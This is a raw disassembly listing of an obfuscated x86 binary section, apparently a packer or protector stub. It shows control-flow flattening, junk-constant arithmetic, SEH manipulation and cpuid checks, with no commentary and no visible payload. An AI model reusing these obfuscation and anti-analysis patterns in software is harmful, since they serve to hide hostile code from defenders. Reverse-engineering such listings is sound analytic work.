; _7hdaygc1:0042EC98�j
; FUNCTION CHUNK AT 0042EF1A SIZE 00000005 BYTES
push ecx
mov ecx, ebp
xchg ecx, [esp+0]
mov ebp, esp
jno sub_4280AB
jmp loc_42EF1A
sub_423FA0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BB83
loc_423FB3: ; CODE XREF: sub_42BB83-EAE�j
jnz loc_424EB1
jmp loc_42CE95
; END OF FUNCTION CHUNK FOR sub_42BB83
; ---------------------------------------------------------------------------
sub edi, 90ED7BC0h
cdq
jmp sub_42BEDA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426064
loc_423FCA: ; CODE XREF: sub_426064:loc_423F7F�j
mov eax, [eax]
push eax
call sub_42D85F
jmp loc_4245DD
; END OF FUNCTION CHUNK FOR sub_426064
; ---------------------------------------------------------------------------
jmp loc_42338B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429B49
loc_423FDC: ; CODE XREF: sub_429B49:loc_429B58�j
add ecx, 27E5E905h
add eax, ecx
pop ecx
push eax
push 0
push offset loc_4280BD
jmp nullsub_25
; END OF FUNCTION CHUNK FOR sub_429B49
; ---------------------------------------------------------------------------
loc_423FF2: ; CODE XREF: _7hdaygc1:0042633B�j
xchg edx, [esp]
mov ecx, edx
pop edx
sub ecx, 2B262EADh
jmp loc_42FCE2
; ---------------------------------------------------------------------------
jl loc_429D4E
jmp sub_42F1C6
; ---------------------------------------------------------------------------
loc_42400E: ; CODE XREF: _7hdaygc1:0042A999�j
add edi, 59ED3502h
add edi, ebp
add edi, 0BDB3850h
mov edi, [edi]
add eax, edi
jmp loc_42A658
; ---------------------------------------------------------------------------
loc_424025: ; CODE XREF: _7hdaygc1:loc_42AE68�j
push edx
push 852BA49Ah
pop edx
sub edx, 0A057D285h
jmp loc_424058
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_123. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jl loc_42F456
jmp sub_42EBB3
; ---------------------------------------------------------------------------
loc_424043: ; CODE XREF: _7hdaygc1:0042A0AA�j
push eax
ror eax, 10h
mov ds:dword_42BC74, eax
retn
; ---------------------------------------------------------------------------
loc_42404E: ; CODE XREF: _7hdaygc1:00427E9D�j
jmp loc_42CCB5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42616B
loc_424053: ; CODE XREF: sub_42616B+6384�j
call sub_42ADFE
loc_424058: ; CODE XREF: _7hdaygc1:00424032�j
jmp loc_42C84B
; END OF FUNCTION CHUNK FOR sub_42616B
; ---------------------------------------------------------------------------
loc_42405D: ; CODE XREF: _7hdaygc1:0042A9E8�j
jno loc_426288
; START OF FUNCTION CHUNK FOR sub_4232DA
loc_424063: ; CODE XREF: sub_4232DA:loc_429787�j
add ebx, 992B36C7h
cmp edi, ebx
pop ebx
jbe loc_42E845
jmp loc_42C65E
; END OF FUNCTION CHUNK FOR sub_4232DA
; ---------------------------------------------------------------------------
loc_424077: ; CODE XREF: _7hdaygc1:0042EAAB�j
; _7hdaygc1:loc_42FBDB�j
mov eax, 10h
push ebx
push 53D8D711h
pop ebx
xor ebx, 0D3E96128h
add ebx, 8010F44Ch
xchg ebx, [esp]
jmp loc_4231F5
; ---------------------------------------------------------------------------
cmp ecx, edi
jmp loc_42D4AB
; =============== S U B R O U T I N E =======================================
sub_42409E proc near ; CODE XREF: sub_42BE7D:loc_425600�p
; _7hdaygc1:0042B6DE�j
; FUNCTION CHUNK AT 004245B2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425EC5 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004297BF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B498 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042EA9B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042F99B SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
lea eax, [ebp-14h]
push eax
call sub_429B49
jmp loc_4245B2
sub_42409E endp
; =============== S U B R O U T I N E =======================================
sub_4240B0 proc near ; CODE XREF: sub_42D757+3�j
; FUNCTION CHUNK AT 00424D9C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425EB7 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042F3EE SIZE 0000001F BYTES
add esp, 0FFFFFFECh
mov eax, offset dword_427C94
jmp loc_42F3EE
sub_4240B0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4268D9
loc_4240BD: ; CODE XREF: sub_4268D9+8D9C�j
adc ebx, 0C143E890h
xor ecx, 49AD72A0h
test eax, 2D05D715h
jmp loc_42610F
; END OF FUNCTION CHUNK FOR sub_4268D9
; =============== S U B R O U T I N E =======================================
sub_4240D4 proc near ; DATA XREF: _7hdaygc1:0042C7CA�o
xchg eax, [esp+0]
jmp sub_42B650
sub_4240D4 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426130
loc_4240DC: ; CODE XREF: sub_426130+901D�j
push esi
popf
jmp loc_42DF67
; END OF FUNCTION CHUNK FOR sub_426130
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CDF7
loc_4240E3: ; CODE XREF: sub_42CDF7:loc_42AD59�j
; _7hdaygc1:0042AD72�j
add esi, 37A6132Ah
xchg esi, [esp+0]
push ecx
pushf
jmp loc_42C04A
; END OF FUNCTION CHUNK FOR sub_42CDF7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FAB8
loc_4240F3: ; CODE XREF: sub_42FAB8:loc_4231B7�j
and edx, 1E12EC5h
add edx, 9D9CB888h
rol edx, 18h
add edx, 74FE6438h
add edx, ebp
jmp loc_423244
; END OF FUNCTION CHUNK FOR sub_42FAB8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BEC6
loc_42410F: ; CODE XREF: sub_42BEC6+F�j
pop edx
pop edx
mov [edx], eax
push 5A24C054h
pop eax
or eax, 6A304D17h
test eax, 4000h
jmp loc_4237C4
; END OF FUNCTION CHUNK FOR sub_42BEC6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E973
loc_42412A: ; CODE XREF: sub_42E973+14�j
add eax, 518E6C83h
add eax, ebp
push ecx
push 0A1F5C707h
pop ecx
and ecx, 12C9A338h
jmp loc_429EE0
; END OF FUNCTION CHUNK FOR sub_42E973
; ---------------------------------------------------------------------------
loc_424144: ; DATA XREF: sub_424AE1+4861�o
push esi
mov esi, eax
xchg esi, [esp]
call sub_426CBB
push 4
lea eax, [ebp-2Ch]
jmp loc_42E81E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291A3
loc_424159: ; CODE XREF: sub_429766-E2D�j
; sub_4291A3+F�j ...
jo loc_427F1B
cmp ds:dword_425154, 0
jnz loc_42E1E2
call sub_425BFC
jmp loc_427F07
; END OF FUNCTION CHUNK FOR sub_4291A3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D002
loc_424176: ; CODE XREF: sub_42D002:loc_42E233�j
call sub_42F8F6
loc_42417B: ; CODE XREF: sub_42BB83-6BCF�j
; DATA XREF: _7hdaygc1:00423C70�o
push eax
push 26F6B023h
pop eax
or eax, 3F47EE14h
test eax, 100h
jmp loc_423EB3
; END OF FUNCTION CHUNK FOR sub_42D002
; ---------------------------------------------------------------------------
loc_424193: ; CODE XREF: _7hdaygc1:0042C0C2�j
xor eax, ebp
; START OF FUNCTION CHUNK FOR sub_4268D9
loc_424195: ; CODE XREF: sub_4268D9:loc_42C0B1�j
rol edi, 0Dh
cmp edi, 290867A2h
jmp loc_42F66D
; END OF FUNCTION CHUNK FOR sub_4268D9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EF91
loc_4241A3: ; CODE XREF: sub_42EF91:loc_426F7D�j
add ecx, 890F554Bh
xchg ecx, [esp+0]
push ecx
pushf
push 6D567819h
jmp loc_42F9A5
; END OF FUNCTION CHUNK FOR sub_42EF91
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AFFE
loc_4241B8: ; CODE XREF: sub_42AFFE:loc_4281BA�j
pop eax
or eax, 11D6F64Eh
rol eax, 7
add eax, 4C2DF67h
jmp loc_4255CC
; END OF FUNCTION CHUNK FOR sub_42AFFE
; ---------------------------------------------------------------------------
cmp ebx, 522B8DCDh
jmp loc_427F32
; ---------------------------------------------------------------------------
loc_4241D8: ; CODE XREF: _7hdaygc1:loc_425CBB�j
; _7hdaygc1:0042FDB7�j
call sub_42D757
mov edx, 64EFA9EDh
push edi
call loc_427F84
; START OF FUNCTION CHUNK FOR sub_4232DA
loc_4241E8: ; CODE XREF: sub_4232DA+6451�j
jmp nullsub_162
; END OF FUNCTION CHUNK FOR sub_4232DA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4241F3
loc_4241ED: ; CODE XREF: sub_4241F3+AF�j
jmp loc_426E65
; END OF FUNCTION CHUNK FOR sub_4241F3
; ---------------------------------------------------------------------------
locret_4241F2: ; CODE XREF: _7hdaygc1:0042C5F6�j
retn
; =============== S U B R O U T I N E =======================================
sub_4241F3 proc near ; CODE XREF: sub_424963:loc_42C1B9�j
; _7hdaygc1:0042CA14�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004241ED SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042427E SIZE 00000029 BYTES
; FUNCTION CHUNK AT 00426E65 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042B107 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B77C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042B985 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
push edx
push 31B17149h
loc_4241FD: ; CODE XREF: _7hdaygc1:00424990�j
jmp loc_42B985
sub_4241F3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C7F3
loc_424202: ; CODE XREF: sub_42C7F3:loc_429203�j
mov ecx, [ebp-30h]
call sub_42A94C
mov edx, [ebp-4]
push 8A67EF81h
pop eax
add eax, 0AF15B94Fh
or eax, 93464CF6h
jmp loc_429576
; END OF FUNCTION CHUNK FOR sub_42C7F3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_424224: ; CODE XREF: sub_424AE1:loc_42B3D5�j
jz loc_428DCA
jmp loc_42990A
; END OF FUNCTION CHUNK FOR sub_424AE1
; ---------------------------------------------------------------------------
loc_42422F: ; CODE XREF: _7hdaygc1:00429C97�j
jnz loc_429C69
jmp loc_42F1BB
; ---------------------------------------------------------------------------
push offset loc_42F340
jmp locret_4231DD
; ---------------------------------------------------------------------------
loc_424244: ; DATA XREF: sub_424494+2D9F�o
pop ebp
push ds:dword_42515C
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4273CA
loc_42424C: ; CODE XREF: sub_4273CA-1D0C�j
jmp loc_42C7D4
; END OF FUNCTION CHUNK FOR sub_4273CA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DDB
loc_424251: ; CODE XREF: sub_423DDB+BEAF�j
call sub_42EF91
loc_424256: ; CODE XREF: _7hdaygc1:004256DB�j
jmp loc_42F74A
; END OF FUNCTION CHUNK FOR sub_423DDB
; ---------------------------------------------------------------------------
loc_42425B: ; CODE XREF: _7hdaygc1:00425043�j
jmp loc_42C0C7
; ---------------------------------------------------------------------------
push edi
jmp sub_42DB44
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4232DA
loc_424266: ; CODE XREF: sub_4232DA+1E�j
jnz loc_4231DE
ror edi, 9
or ebx, 0F42BBE8Eh
xchg ebp, [esi]
and edx, eax
jmp loc_4231DE
; END OF FUNCTION CHUNK FOR sub_4232DA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4241F3
loc_42427E: ; CODE XREF: sub_4241F3:loc_42B985�j
xchg ebx, [esp+4+var_4]
mov edx, ebx
pop ebx
or edx, 7C990968h
and edx, 74938F8h
xor edx, 778A5942h
and edx, 7F970362h
cmp edx, 0DF6D7AB4h
jmp loc_4241ED
; END OF FUNCTION CHUNK FOR sub_4241F3
; ---------------------------------------------------------------------------
loc_4242A7: ; CODE XREF: _7hdaygc1:00426A99�j
call sub_42EBFB
loc_4242AC: ; CODE XREF: _7hdaygc1:0042B711�j
jmp loc_429ECB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F3C8
loc_4242B1: ; CODE XREF: sub_42F3C8-97B6�j
jmp loc_42EA29
; END OF FUNCTION CHUNK FOR sub_42F3C8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425339
loc_4242B6: ; CODE XREF: sub_425339+40D4�j
jz loc_42DDE3
mov ecx, [ebx+ecx+0Ch]
or ecx, ecx
jz loc_42DDE3
mov edx, [ebx+ecx]
xor edx, [ebx+ecx+4]
cmp edx, 7C61090Eh
jz loc_42ADA9
jmp loc_42DE46
; END OF FUNCTION CHUNK FOR sub_425339
; =============== S U B R O U T I N E =======================================
sub_4242E0 proc near ; CODE XREF: sub_426130:loc_42C933�p
; _7hdaygc1:0042ED0C�j
; FUNCTION CHUNK AT 00429C9C SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0042C98B SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
push eax
push 1F6E80F8h
jmp loc_42C98B
sub_4242E0 endp
; ---------------------------------------------------------------------------
loc_4242EF: ; CODE XREF: _7hdaygc1:00426848�j
jz loc_4293BF
jmp loc_42A624
; ---------------------------------------------------------------------------
loc_4242FA: ; DATA XREF: sub_4260B4+7BF5�o
pop ebp
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A2B
loc_4242FC: ; CODE XREF: sub_42D245:loc_429B19�j
; sub_424A2B:loc_42F2DF�j
mov eax, [ebp-0Ch]
movzx eax, byte ptr [eax]
add [ebp-8], eax
mov eax, [ebp-8]
jmp loc_4250CB
; END OF FUNCTION CHUNK FOR sub_424A2B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_96. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BE63
loc_42430E: ; CODE XREF: sub_42BE63+15�j
jmp loc_42AC35
; END OF FUNCTION CHUNK FOR sub_42BE63
; ---------------------------------------------------------------------------
cmp edx, 811EF56h
jmp loc_4273AC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BB83
loc_42431E: ; CODE XREF: sub_42BB83-6CC6�j
or esi, 0FACE2AB0h
rol esi, 12h
add esi, 54630D1Eh
rol esi, 0Fh
xor esi, 862E8805h
jmp loc_426E5B
; END OF FUNCTION CHUNK FOR sub_42BB83
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424494
loc_42433B: ; CODE XREF: sub_424494:loc_42EF72�j
call nullsub_3
call sub_42D757
mov edx, 0CF0182F6h
call sub_42C763
mov ds:dword_42515C, eax
jmp loc_42EA57
; END OF FUNCTION CHUNK FOR sub_424494
; =============== S U B R O U T I N E =======================================
sub_424359 proc near ; CODE XREF: sub_425F27-939�j
var_8 = dword ptr -8
; FUNCTION CHUNK AT 00426DF5 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00428215 SIZE 00000005 BYTES
push ebp
xchg ebx, ecx
loc_42435C: ; CODE XREF: sub_42616B:loc_42A41C�j
push ecx
push 0D7DE4B31h
pop ecx
and ecx, 0CC71CDC0h
jmp loc_426DF5
sub_424359 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AFFE
loc_42436E: ; CODE XREF: sub_42F642:loc_425113�j
; sub_42AFFE:loc_425125�j
xor esi, 52179AC1h
add esi, 0B804390h
push offset loc_42CA95
jmp loc_427C98
; END OF FUNCTION CHUNK FOR sub_42AFFE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_149. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_424385 proc near ; CODE XREF: sub_42B942:loc_424716�p
; _7hdaygc1:004267AF�j
xchg eax, [esp+0]
pop eax
push edi
mov edi, ebp
xchg edi, [esp+0]
mov ebp, esp
jmp sub_423B20
sub_424385 endp
; ---------------------------------------------------------------------------
mov esi, 19C46950h
jmp sub_42E5AE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E283
loc_4243A0: ; CODE XREF: sub_42E283:loc_426E23�j
; sub_42E283-49DD�j
push edx
push 80E82AC4h
pop edx
add edx, 539E05Dh
jmp loc_42EB52
; END OF FUNCTION CHUNK FOR sub_42E283
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424744
loc_4243B2: ; CODE XREF: sub_424744:loc_42F941�j
; _7hdaygc1:0042F95C�j
sub esi, 623E4F3Ch
xor esi, 964D970Eh
cmp esi, 8217E901h
jmp loc_42BC6D
; END OF FUNCTION CHUNK FOR sub_424744
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_4243C9: ; CODE XREF: sub_4291EA+ED1�j
mov ecx, esi
pop esi
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_4291EA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C369
loc_4243CF: ; CODE XREF: sub_42C369-600D�j
jmp nullsub_93
; END OF FUNCTION CHUNK FOR sub_42C369
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_208. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423648
loc_4243D5: ; CODE XREF: sub_423648+A00E�j
cmp dword ptr [ebp-8], 0
jz loc_423652
loc_4243DF: ; CODE XREF: sub_423648+4�j
; sub_423648:loc_42EC57�j
jz loc_428B85
cmp dword ptr [ebp-1Ch], 0Fh
jnz loc_42F13C
mov eax, [ebp-1Ch]
jmp loc_42CADC
; END OF FUNCTION CHUNK FOR sub_423648
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AFB3
loc_4243F7: ; CODE XREF: sub_42AFB3+7�j
mov esp, [esp+arg_4]
loc_4243FB: ; CODE XREF: _7hdaygc1:00423715�j
; _7hdaygc1:00423721�j ...
xor eax, eax
loc_4243FD: ; CODE XREF: _7hdaygc1:loc_428F4D�j
; _7hdaygc1:0042E39F�j
pop large dword ptr fs:0
pop edx
jmp loc_423CF7
; END OF FUNCTION CHUNK FOR sub_42AFB3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_152. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DFC
loc_42440B: ; CODE XREF: sub_423DFC+87F�j
jmp loc_423B9F
; END OF FUNCTION CHUNK FOR sub_423DFC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CDF7
loc_424410: ; CODE XREF: sub_42CDF7-111E�j
jz loc_424C5A
loc_424416: ; CODE XREF: sub_42F0D1-1BDE�j
jmp nullsub_2
; END OF FUNCTION CHUNK FOR sub_42CDF7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BAE7
loc_42441B: ; CODE XREF: sub_42BAE7+12�j
jmp loc_423BC9
; END OF FUNCTION CHUNK FOR sub_42BAE7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E4D7
loc_424420: ; CODE XREF: sub_42E4D7-5244�j
jmp sub_42D757
; END OF FUNCTION CHUNK FOR sub_42E4D7
; ---------------------------------------------------------------------------
cmp ecx, 0F1D87A6Fh
jmp loc_42C281
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_93. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CDF7
loc_424431: ; CODE XREF: sub_42CDF7+1F�j
jmp loc_42EEAC
; END OF FUNCTION CHUNK FOR sub_42CDF7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B470
loc_424436: ; CODE XREF: sub_42B470+9�j
jmp loc_42629B
; END OF FUNCTION CHUNK FOR sub_42B470
; ---------------------------------------------------------------------------
jmp loc_42FADC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EB0D
loc_424440: ; CODE XREF: sub_42EB0D-8036�j
mov eax, [eax+60h]
add eax, [ebp-4]
mov [ebp-14h], eax
mov eax, [ebp-14h]
mov eax, [eax+18h]
jmp loc_42BB76
; END OF FUNCTION CHUNK FOR sub_42EB0D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA11
loc_424454: ; CODE XREF: sub_42AA11:loc_42B995�j
xchg edi, [esp+0]
mov [ebp-4], eax
mov eax, offset dword_42BC4C
push eax
push 9CCD22ABh
mov eax, ebx
jmp loc_42912C
; END OF FUNCTION CHUNK FOR sub_42AA11
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B265
loc_42446C: ; CODE XREF: sub_42B265+B�j
push 5A7A6AD6h
pop ebx
rol ebx, 8
and ebx, 0D4271C44h
sub ebx, 0FA6085A5h
and ebx, 466EB20Dh
add ebx, 297A1244h
jmp loc_42A617
; END OF FUNCTION CHUNK FOR sub_42B265
; ---------------------------------------------------------------------------
loc_424492: ; CODE XREF: _7hdaygc1:0042945B�j
add eax, ecx
; =============== S U B R O U T I N E =======================================
sub_424494 proc near ; CODE XREF: sub_42567E-DAE�p
; FUNCTION CHUNK AT 0042433B SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00427227 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042EA57 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EF72 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
cmp ds:dword_42515C, 0
jnz loc_427227
jmp loc_42EF72
sub_424494 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428B5B
loc_4244AA: ; CODE XREF: sub_428B5B-39AD�j
jo loc_424BC3
; END OF FUNCTION CHUNK FOR sub_428B5B
; START OF FUNCTION CHUNK FOR sub_424680
loc_4244B0: ; CODE XREF: _7hdaygc1:loc_426696�j
; sub_424E9C:loc_42A745�j ...
push offset loc_42A565
jmp nullsub_48
; END OF FUNCTION CHUNK FOR sub_424680
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E283
loc_4244BA: ; CODE XREF: sub_42E283:loc_42E53D�j
push esi
push 7DFBB1C4h
pop esi
rol esi, 1Fh
xor esi, 0BDF25A8Dh
add ebp, esi
push offset loc_427012
jmp nullsub_90
; END OF FUNCTION CHUNK FOR sub_42E283
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_62. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B74A
loc_4244D7: ; CODE XREF: sub_42B74A:loc_423013�j
; sub_42B74A-83AA�j
mov eax, 400h
call sub_42828C
push ebx
push 0F6AD9FD0h
sbb ebx, 0F59D3675h
jmp loc_42D066
; END OF FUNCTION CHUNK FOR sub_42B74A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A833
loc_4244F2: ; CODE XREF: sub_42A833+9�j
push offset loc_424DE3
jmp nullsub_40
; END OF FUNCTION CHUNK FOR sub_42A833
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424E42
loc_4244FC: ; CODE XREF: sub_424E42:loc_427DBB�j
pushf
push 38A3EDC0h
pop edi
or edi, 35B50895h
jmp loc_42ABC4
; END OF FUNCTION CHUNK FOR sub_424E42
; =============== S U B R O U T I N E =======================================
sub_42450E proc near ; DATA XREF: sub_425752:loc_42F587�o
; FUNCTION CHUNK AT 00424FD0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426104 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426C72 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 004284BB SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042D2A5 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042D2DD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F460 SIZE 00000005 BYTES
add eax, 8000h
push eax
push 0
push 0
push eax
push 677BA0F3h
pop eax
jmp loc_426C72
sub_42450E endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_23. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42911B
loc_424525: ; CODE XREF: sub_42911B+2711�j
jmp loc_42A2B1
; END OF FUNCTION CHUNK FOR sub_42911B
; ---------------------------------------------------------------------------
loc_42452A: ; CODE XREF: _7hdaygc1:0042464B�j
js loc_42CD70
or ebp, 2F6477D6h
jmp loc_42CD6A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B650
loc_42453B: ; CODE XREF: sub_42B650:loc_42B260�j
mov ebp, esp
add esp, 0FFFFFFF8h
call sub_42ECAF
; END OF FUNCTION CHUNK FOR sub_42B650
; START OF FUNCTION CHUNK FOR sub_429766
loc_424545: ; CODE XREF: sub_429766:loc_429777�j
jmp loc_428926
; END OF FUNCTION CHUNK FOR sub_429766
; ---------------------------------------------------------------------------
locret_42454A: ; CODE XREF: _7hdaygc1:00429D49�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C443
loc_42454B: ; CODE XREF: sub_42C443+248E�j
ja loc_4287A1
loc_424551: ; CODE XREF: sub_42C443:loc_42CD34�j
mov edi, eax
mov eax, 80000001h
xor edx, edx
cpuid
and eax, 0FFFh
add [esi], eax
xor [esi], edx
jmp loc_424AA3
; END OF FUNCTION CHUNK FOR sub_42C443
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D5F1
loc_42456A: ; CODE XREF: sub_42D5F1+F�j
push offset loc_42A6AD
jmp loc_426AE7
; END OF FUNCTION CHUNK FOR sub_42D5F1
; ---------------------------------------------------------------------------
loc_424574: ; CODE XREF: _7hdaygc1:0042BE57�j
push offset loc_428B17
jmp locret_42F372
; ---------------------------------------------------------------------------
loc_42457E: ; CODE XREF: _7hdaygc1:00426923�j
mov ebp, esp
push ebp
push ecx
pop ebp
jmp loc_42B705
; =============== S U B R O U T I N E =======================================
sub_424588 proc near ; CODE XREF: _7hdaygc1:00423315�j
; _7hdaygc1:0042F38D�p
xchg ecx, [esp+0]
pop ecx
mov eax, [eax]
jmp loc_425C43
sub_424588 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4270E6
loc_424593: ; CODE XREF: sub_4270E6:loc_42FCC0�j
mov eax, offset dword_428388
mov [ebp-4], eax
push ebx
push 0B42A972Bh
jmp loc_42D06C
; END OF FUNCTION CHUNK FOR sub_4270E6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EBC8
loc_4245A6: ; CODE XREF: sub_42EBC8:loc_4252DD�j
add edx, ebp
call sub_42926C
loc_4245AD: ; CODE XREF: _7hdaygc1:00429C74�j
jmp nullsub_202
; END OF FUNCTION CHUNK FOR sub_42EBC8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42409E
loc_4245B2: ; CODE XREF: sub_42409E+D�j
jmp loc_425EC5
; END OF FUNCTION CHUNK FOR sub_42409E
; ---------------------------------------------------------------------------
sbb edi, ecx
jmp loc_42951B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EBC8
loc_4245BE: ; CODE XREF: sub_42EBC8+9�j
push edx
push 6A7357Ch
pop edx
and edx, 0C4BF7A00h
or edx, 678A927Fh
sub edx, 0AF8013D6h
or edx, ds:4000F0h
loc_4245DD: ; CODE XREF: sub_426064-2092�j
xor edx, 0ED5DFD8Bh
jmp loc_4252DD
; END OF FUNCTION CHUNK FOR sub_42EBC8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_209. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424744
loc_4245E9: ; CODE XREF: sub_424744:loc_42895B�j
jz loc_42E150
jmp loc_428EC7
; END OF FUNCTION CHUNK FOR sub_424744
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_25. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4288FE
loc_4245F5: ; CODE XREF: sub_4288FE:loc_42648E�j
rol eax, 1Fh
xor eax, 9F5F2354h
and eax, 1B6FCBC7h
xor eax, 196B0B03h
push offset loc_426F37
jmp loc_42896E
; END OF FUNCTION CHUNK FOR sub_4288FE
; ---------------------------------------------------------------------------
push 56148A89h
pop eax
rol eax, 16h
add eax, 0B66137DCh
add eax, ebp
add eax, 0A74942E6h
mov eax, [eax]
push eax
jmp loc_42463E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429318
loc_424633: ; CODE XREF: sub_429318-3E1E�j
jnz loc_42F895
jmp loc_423F28
; END OF FUNCTION CHUNK FOR sub_429318
; ---------------------------------------------------------------------------
loc_42463E: ; CODE XREF: _7hdaygc1:0042462E�j
push ecx
push 0B1F780h
pop ecx
xor ecx, 89CBC897h
jmp loc_42452A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425E64
loc_424650: ; CODE XREF: sub_425E64+7CCA�j
push eax
push 0
call sub_42E29B
retn
